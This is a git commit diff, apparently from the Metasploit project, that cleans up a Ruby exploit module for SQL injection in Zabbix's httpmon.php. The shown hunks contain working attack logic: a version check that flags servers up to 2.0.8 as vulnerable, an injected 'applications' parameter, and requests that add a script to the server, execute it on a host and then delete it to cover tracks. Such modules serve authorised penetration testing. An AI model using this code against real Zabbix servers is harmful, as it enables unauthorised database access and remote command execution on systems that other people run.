Clean zabbix_sqli
jvazquez-r7
parent
171b70fa7c
commit
a6f17c3ba0
|
|
@ -55,14 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix']),
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
def uri
|
||||
return target_uri.path
|
||||
end
|
||||
|
|
@ -76,8 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(uri, "httpmon.php")
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/
|
||||
res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/
|
||||
if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/
|
||||
version = $1
|
||||
print_status("#{peer} - Zabbix version #{version} detected")
|
||||
else
|
||||
|
|
@ -86,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if version and version <= "2.0.6"
|
||||
if version and version <= "2.0.8"
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
@ -106,8 +101,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => normalize_uri("#{uri}", "httpmon.php"),
|
||||
'vars_get' => {
|
||||
"applications" => sqli,
|
||||
},
|
||||
"applications" => sqli
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/
|
||||
|
|
@ -142,8 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'usrgrpid' => '0',
|
||||
'groupid' => '0',
|
||||
'access' => '2',
|
||||
'save' => 'Save',
|
||||
},
|
||||
'save' => 'Save'
|
||||
}
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /(Script added)/
|
||||
|
|
@ -165,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"scriptid" => @scriptid,
|
||||
"sid" => @sid,
|
||||
"hostid" => "10084"
|
||||
},
|
||||
}
|
||||
})
|
||||
end
|
||||
|
||||
|
|
@ -180,9 +175,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /(Script deleted)/
|
||||
vprint_status("#{peer} - Script removed successfully")
|
||||
print_status("#{peer} - Script removed successfully")
|
||||
else
|
||||
vprint_warning("#{peer} - Unable to remove script #{@scriptid}")
|
||||
print_warning("#{peer} - Unable to remove script #{@scriptid}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue